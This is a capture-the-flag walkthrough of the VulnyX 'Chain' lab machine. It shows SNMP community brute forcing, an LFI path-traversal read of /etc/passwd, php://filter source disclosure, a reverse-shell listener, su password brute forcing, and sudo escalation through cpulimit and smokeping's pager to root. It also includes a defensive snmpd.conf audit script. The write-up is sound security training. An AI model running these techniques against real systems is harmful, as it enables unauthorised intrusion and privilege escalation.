Vulnyx-Chain-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.231 08:00:27:21:0c:70 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e1:d8:58 VMware, Inc.

10 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.053 seconds (124.70 hosts/sec). 4 responded
export ip=192.168.60.231
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
You miss 100% of the ports you don't scan. - RustScan

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.231:80
[~] Starting Script(s)
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 21:27 CST
Initiating ARP Ping Scan at 21:27
Scanning 192.168.60.231 [1 port]
Completed ARP Ping Scan at 21:27, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:27
Completed Parallel DNS resolution of 1 host. at 21:27, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 21:27
Scanning 192.168.60.231 [1 port]
Discovered open port 80/tcp on 192.168.60.231
Completed SYN Stealth Scan at 21:27, 0.03s elapsed (1 total ports)
Nmap scan report for 192.168.60.231
Host is up, received arp-response (0.00032s latency).
Scanned at 2025-03-05 21:27:33 CST for 0s

PORT STATE SERVICE REASON
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:21:0C:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds
Raw packets sent: 2 (72B) | Rcvd: 2 (72B)

Only port 80 is open, so the next step is directory enumeration.

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.231
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: php,html,zip,txt
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 202]
/wordpress (Status: 301) [Size: 320] [--> http://192.168.60.231/wordpress/]
/javascript (Status: 301) [Size: 321] [--> http://192.168.60.231/javascript/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

The Trap

Open port 80 in a browser.

The page shows an image and a hint.

[image]

Download it with wget and take a look; the metadata does not seem to contain anything useful.

❯ exiftool chain.png
ExifTool Version Number : 13.00
File Name : chain.png
Directory : .
File Size : 44 kB
File Modification Date/Time : 2023:06:23 18:25:22+08:00
File Access Date/Time : 2025:03:05 21:33:09+08:00
File Inode Change Date/Time : 2025:03:05 21:32:52+08:00
File Permissions : -rw-r--r--
File Type : JPEG
File Type Extension : jpg
MIME Type : image/jpeg
JFIF Version : 1.01
Resolution Unit : None
X Resolution : 1
Y Resolution : 1
Image Width : 820
Image Height : 673
Encoding Process : Baseline DCT, Huffman coding
Bits Per Sample : 8
Color Components : 3
Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
Image Size : 820x673
Megapixels : 0.552

I assumed this was image steganography and tried stegseek to extract a payload, without result.

binwalk, however, shows that the image has other data hidden inside it.

There is an embedded private key file; carve it out with dd.

Cracking the private key's passphrase gives blue12.

❯ binwalk chain.png

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
42205 0xA4DD PEM RSA private key

dd if=chain.png of=id_rsa bs=1 skip=42205
1758+0 records in
1758+0 records out
1758 bytes (1.8 kB, 1.7 KiB) copied, 0.00131424 s, 1.3 MB/s
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,92E78A581F3E1F25
(encrypted key body omitted)
-----END RSA PRIVATE KEY-----
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
blue12 (id_rsa)
1g 0:00:00:00 DONE (2025-03-05 21:47) 33.33g/s 99200p/s 99200c/s 99200C/s kikay..14789632
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

But we do not know the username, and the target does not have port 22 open.

So this key is most likely a red herring meant to throw us off.

SNMP Enumeration

With no other information, we have to go off the beaten path.

Try scanning UDP ports.

The scan is slow, but it reveals that port 161 (SNMP) is open.

❯ nmap -sU -sV --version-intensity 0 -n -F -T4 $ip
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-05 22:04 CST
Nmap scan report for 192.168.60.231
Host is up (0.0011s latency).
Not shown: 59 open|filtered udp ports (no-response), 40 closed udp ports (port-unreach)
PORT STATE SERVICE VERSION
161/udp open snmp net-snmp
MAC Address: 08:00:27:21:0C:70 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.54 seconds

Through the SNMP service we can read a great deal of information about the host.

Brute Force - CheatSheet - HackTricks

Using the command from the cheat sheet above, try brute-forcing the community string.

We get security.

❯ onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt $ip
Scanning 1 hosts, 122 communities
192.168.60.231 [security] Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64

An SNMP (Simple Network Management Protocol) community string is a credential used to access and control the data on a network device. A community string can be thought of as the device's user ID or password; it is sent along with every SNMP request. There are the following types of community strings:

  1. Read-only community string: allows a device to retrieve read-only data from another device.
  2. Read-write community string: used to retrieve data and change the device configuration.
  3. SNMP trap community string: used when the device sends an SNMP trap.

Community strings differ between SNMP versions. The common versions are SNMPv1, SNMPv2c and SNMPv3; in v1 and v2c the community string travels in cleartext and is the only access control, which is why a guessable string like the one found here exposes the whole system MIB, whereas v3 adds per-user authentication and encryption.
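As an added example that is not part of the original post, the following audit reads a net-snmp snmpd.conf and flags v1/v2c community strings of the kind onesixtyone guessed on this host; the config fragment and the wordlist excerpt are constructed here so it runs offline.

```python
# Added example, not from the original post. Flags net-snmp rocommunity/rwcommunity
# directives (SNMPv1/v2c) whose community appears in a default wordlist, is accepted
# from any source, or grants read-write access. Sample data below is constructed.
import re

# Constructed snmpd.conf fragment; "security" is the community found on the box.
SNMPD_CONF = """\
# Listen on all interfaces
agentaddress udp:161
rocommunity security default
rwcommunity  public  192.168.60.0/24
rouser  monitor  authpriv
sysLocation VulNyx.com
"""

# Constructed excerpt standing in for snmp_default_pass.txt.
DEFAULT_COMMUNITIES = {"public", "private", "security", "manager", "cisco"}

# rocommunity / rwcommunity COMMUNITY [SOURCE ...]; rouser (v3) lines are not matched.
COMMUNITY_RE = re.compile(r"^\s*(ro|rw)community6?\s+(\S+)(?:\s+(\S+))?", re.IGNORECASE)


def audit_snmpd_conf(conf_text, defaults=DEFAULT_COMMUNITIES):
    """Return findings as (line_no, access, community, source, reasons) tuples."""
    findings = []
    for no, line in enumerate(conf_text.splitlines(), 1):
        m = COMMUNITY_RE.match(line)
        if not m:
            continue
        access, community = m.group(1).lower(), m.group(2)
        source = m.group(3) or "default"   # net-snmp accepts any source when omitted
        reasons = ["v1/v2c community (cleartext, no per-user auth)"]
        if community.lower() in defaults:
            reasons.append("community appears in default wordlist")
        if source == "default":
            reasons.append("accepted from any source address")
        if access == "rw":
            reasons.append("read-write access")
        findings.append((no, access, community, source, reasons))
    return findings
```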

Enumerate SNMP with snmpwalk.

The enumeration output shows that the target is also bound to the domain name chaincorp.nyx.

❯ snmpwalk -v1 -c security $ip
iso.3.6.1.2.1.1.1.0 = STRING: "Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.8072.3.2.10
iso.3.6.1.2.1.1.3.0 = Timeticks: (323096) 0:53:50.96
iso.3.6.1.2.1.1.4.0 = STRING: "Blue <[email protected]>"
iso.3.6.1.2.1.1.5.0 = STRING: "Chain"
iso.3.6.1.2.1.1.6.0 = STRING: "VulNyx.com"
iso.3.6.1.2.1.1.8.0 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.1.9.1.2.1 = OID: iso.3.6.1.6.3.10.3.1.1
iso.3.6.1.2.1.1.9.1.2.2 = OID: iso.3.6.1.6.3.11.3.1.1
iso.3.6.1.2.1.1.9.1.2.3 = OID: iso.3.6.1.6.3.15.2.1.1
iso.3.6.1.2.1.1.9.1.2.4 = OID: iso.3.6.1.6.3.1
iso.3.6.1.2.1.1.9.1.2.5 = OID: iso.3.6.1.6.3.16.2.2.1
iso.3.6.1.2.1.1.9.1.2.6 = OID: iso.3.6.1.2.1.49
iso.3.6.1.2.1.1.9.1.2.7 = OID: iso.3.6.1.2.1.50
iso.3.6.1.2.1.1.9.1.2.8 = OID: iso.3.6.1.2.1.4
iso.3.6.1.2.1.1.9.1.2.9 = OID: iso.3.6.1.6.3.13.3.1.3
iso.3.6.1.2.1.1.9.1.2.10 = OID: iso.3.6.1.2.1.92
iso.3.6.1.2.1.1.9.1.3.1 = STRING: "The SNMP Management Architecture MIB."
iso.3.6.1.2.1.1.9.1.3.2 = STRING: "The MIB for Message Processing and Dispatching."
iso.3.6.1.2.1.1.9.1.3.3 = STRING: "The management information definitions for the SNMP User-based Security Model."
iso.3.6.1.2.1.1.9.1.3.4 = STRING: "The MIB module for SNMPv2 entities"
iso.3.6.1.2.1.1.9.1.3.5 = STRING: "View-based Access Control Model for SNMP."
iso.3.6.1.2.1.1.9.1.3.6 = STRING: "The MIB module for managing TCP implementations"
iso.3.6.1.2.1.1.9.1.3.7 = STRING: "The MIB module for managing UDP implementations"
iso.3.6.1.2.1.1.9.1.3.8 = STRING: "The MIB module for managing IP and ICMP implementations"
iso.3.6.1.2.1.1.9.1.3.9 = STRING: "The MIB modules for managing SNMP Notification, plus filtering."
iso.3.6.1.2.1.1.9.1.3.10 = STRING: "The MIB module for logging SNMP Notifications."
iso.3.6.1.2.1.1.9.1.4.1 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.2 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.3 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.4 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.5 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.6 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.7 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.8 = Timeticks: (3) 0:00:00.03
iso.3.6.1.2.1.1.9.1.4.9 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.1.9.1.4.10 = Timeticks: (4) 0:00:00.04
iso.3.6.1.2.1.25.1.1.0 = Timeticks: (323358) 0:53:53.58
iso.3.6.1.2.1.25.1.2.0 = Hex-STRING: 07 E9 03 05 0F 14 2F 00 2B 01 00
iso.3.6.1.2.1.25.1.3.0 = INTEGER: 393216
iso.3.6.1.2.1.25.1.4.0 = STRING: "BOOT_IMAGE=/boot/vmlinuz-5.10.0-23-amd64 root=UUID=5ed23ff9-728b-4a2d-b183-ac3d76b133ba ro quiet
"
iso.3.6.1.2.1.25.1.5.0 = Gauge32: 0
iso.3.6.1.2.1.25.1.6.0 = Gauge32: 82
iso.3.6.1.2.1.25.1.7.0 = INTEGER: 0
End of MIB

Edit the hosts file and add the domain.

echo "$ip chaincorp.nyx"|sudo tee -a /etc/hosts
192.168.60.231 chaincorp.nyx

Subdomain Enumeration

Try fuzzing the Host header to enumerate subdomains.

This reveals utils.chaincorp.nyx.

❯ wfuzz -c -u "http://chaincorp.nyx" -H "HOST:FUZZ.chaincorp.nyx" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hw 22

/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************

Target: http://chaincorp.nyx/
Total requests: 114441

=====================================================================
ID Response Lines Word Chars Payload
=====================================================================

000012080: 200 20 L 37 W 628 Ch "utils - utils"

Total time: 51.52052
Processed Requests: 114441
Filtered Requests: 114436
Requests/sec.: 2221.270

Edit the hosts file again.

echo "$ip chaincorp.nyx utils.chaincorp.nyx"|sudo tee -a /etc/hosts
192.168.60.231 chaincorp.nyx utils.chaincorp.nyx

A curl request shows that the site has an LFI (local file inclusion) vulnerability.

Try retrieving /etc/passwd.

We get two users: blue and red.

❯ curl utils.chaincorp.nyx
<!DOCTYPE html>
<html>
<head>
<title>System Utils</title>
</head>
<body>
<h1>System Utils</h1>
<p>Choose the desired utility and run it.</p>
<ul>
<li><a href="include.php?in=id.php">id</a></li>
<li><a href="include.php?in=ip.php">ip</a></li>
<li><a href="include.php?in=ps.php">ps</a></li>
<li><a href="include.php?in=ss.php">ss</a></li>
<li><a href="include.php?in=uname.php">uname</a></li>
<li><a href="include.php?in=uptime.php">uptime</a></li>
<li><a href="include.php?in=whoami.php">whoami</a></li>
<li><a href="include.php?in=hostname.php">hostname</a></li>
</ul>
</body>
</html>
❯ curl http://utils.chaincorp.nyx/include.php\?in\=../../../../etc/passwd |grep /bin/bash
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 1621 100 1621 0 0 460k 0 --:--:-- --:--:-- --:--:-- 527k
root:x:0:0:root:/root:/bin/bash
blue:x:1000:1000:blue:/home/blue:/bin/bash
red:x:1001:1001:red:/home/red:/bin/bash

We also find that a php://filter wrapper can be used to read file source code.

❯ curl http://utils.chaincorp.nyx/include.php\?in\=php://filter/convert.base64-encode/resource\=include.php
<pre>
PHByZT4KPD9waHAKICAkZmlsZSA9ICRfR0VUWyJpbiJdOwogIGlmKGlzc2V0KCRmaWxlKSkKICB7CiAgICBpbmNsdWRlKCIkZmlsZSIpOwogIH0KPz4KPC9wcmU+Cg==</pre>
echo "PHByZT4KPD9waHAKICAkZmlsZSA9ICRfR0VUWyJpbiJdOwogIGlmKGlzc2V0KCRmaWxlKSkKICB7CiAgICBpbmNsdWRlKCIkZmlsZSIpOwogIH0KPz4KPC9wcmU+Cg=="|base64 -d
<pre>
<?php
$file = $_GET["in"];
if(isset($file))
{
include("$file");
}
?>
</pre>

LFI2Rce

Try using a PHP filter chain to execute arbitrary commands.

Reference: HackMyVM-Medusa-Walkthrough | Pepster'Blog

Trigger it with curl.

User Privilege Escalation

Start a listener.

❯ pwncat-cs -lp 4444
[22:39:35] Welcome to pwncat 🐈! __main__.py:164
[22:40:42] received connection from 192.168.60.231:45052 bind.py:84
[22:40:43] 192.168.60.231:45052: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@chain:/var/www/vhost$

I tried using the private key recovered earlier to log in over SSH locally.

It still would not log in; the .ssh permissions are probably wrong.

(remote) www-data@chain:/var/www/html$ cd /tmp/
(remote) www-data@chain:/tmp$ vi id_rsa
(remote) www-data@chain:/tmp$ chmod 600 id_rsa
(remote) www-data@chain:/tmp$ ssh blue@localhost -i id_rsa
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:12N3485v29gfnxp3ZD1Mt/mS9bwzNIr13ANJRuIcbcQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':
blue@localhost: Permission denied (publickey).
(remote) www-data@chain:/tmp$ ssh red@localhost -i id_rsa
Enter passphrase for key 'id_rsa':
red@localhost: Permission denied (publickey).

With no other information, the only option left is to brute-force the user's password.

I was already halfway through the wordlist and it still had not found anything⁉️

(remote) www-data@chain:/tmp$ ./suForce -u blue -w techyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | blue
📖 Wordlist | techyou.txt
🔎 Status | 12974/20000/64%/303677

Root Privilege Escalation

After checking the writeup, I found that suForce has a problem: it had to be interrupted and run again.

(remote) www-data@chain:/tmp$ ./suForce -u blue -w techyou.txt
_____
___ _ _ | ___|__ _ __ ___ ___
/ __| | | || |_ / _ \| '__/ __/ _ \
\__ \ |_| || _| (_) | | | (_| __/
|___/\__,_||_| \___/|_| \___\___|
───────────────────────────────────
code: d4t4s3c version: v1.0.0
───────────────────────────────────
🎯 Username | blue
📖 Wordlist | techyou.txt
🔎 Status | 2305/20000/11%/skyblue
💥 Password | skyblue
───────────────────────────────────


(remote) www-data@chain:/tmp$ su blue
Password:
blue@chain:/tmp$

First grab the user flag; sudo -l shows that user blue has a sudo rule.

cpulimit can be used to escalate to the red user.

The red user also has a sudo rule.

blue@chain:/tmp$ cat ~/user.txt
eb46e37ab06e8c080be2b907036b8205
blue@chain:/tmp$ sudo -l
Matching Defaults entries for blue on chain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blue may run the following commands on chain:
(red) NOPASSWD: /usr/bin/cpulimit
blue@chain:/tmp$ sudo -u red /usr/bin/cpulimit -l 100 -f /bin/sh
Process 77631 detected
red@chain:/tmp$ sudo -l
Matching Defaults entries for red on chain:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User red may run the following commands on chain:
(root) NOPASSWD: /usr/sbin/smokeping

Check the usage: the --man option opens the manual page through a pager (less), so the usual pager-to-shell escalation applies.

--man[=x]: show the program's manual page (or the manual page of the specified probe).

red@chain:/tmp$ sudo /usr/sbin/smokeping --man
You need to install the perl-doc package to use this program.
root@chain:/tmp# id
uid=0(root) gid=0(root) grupos=0(root)
root@chain:/tmp# cat /root/root.txt
e3ed9239f6a751276f3e803968efb36b